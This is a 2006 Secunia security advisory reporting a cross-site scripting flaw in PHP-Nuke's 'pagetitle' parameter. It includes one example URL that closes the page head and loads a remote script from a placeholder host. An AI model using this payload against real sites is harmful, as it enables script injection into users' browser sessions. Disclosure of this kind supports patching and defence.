[SA18820] PHP-Nuke "pagetitle" Cross-Site Scripting Vulnerability

2006-02-13T00:00:00
ID SECURITYVULNS:DOC:11406
Type securityvulns
Reporter Securityvulns
Modified 2006-02-13T00:00:00

Description

TITLE: PHP-Nuke "pagetitle" Cross-Site Scripting Vulnerability

SECUNIA ADVISORY ID: SA18820

VERIFY ADVISORY: http://secunia.com/advisories/18820/

CRITICAL: Less critical

IMPACT: Cross Site Scripting

WHERE: >From remote

SOFTWARE: PHP-Nuke 7.x http://secunia.com/product/2385/ PHP-Nuke 6.x http://secunia.com/product/329/

DESCRIPTION: Janek Vind "waraxe" has discovered a vulnerability in PHP-Nuke, which can be exploited by malicious people to conduct cross-site scripting attacks.

Input passed to the "pagetitle" parameter in "header.php" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Example: http://[host]/?pagetitle=title</title></head><script+src=http://[host]/script.js?

The vulnerability has been confirmed in version 7.8. Prior versions may also be affected.

SOLUTION: Edit the source code to ensure that input is properly sanitised.

PROVIDED AND/OR DISCOVERED BY: Janek Vind "waraxe"

ORIGINAL ADVISORY: http://www.waraxe.us/advisory-44.html


About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.

Subscribe: http://secunia.com/secunia_security_advisories/

Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/

Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.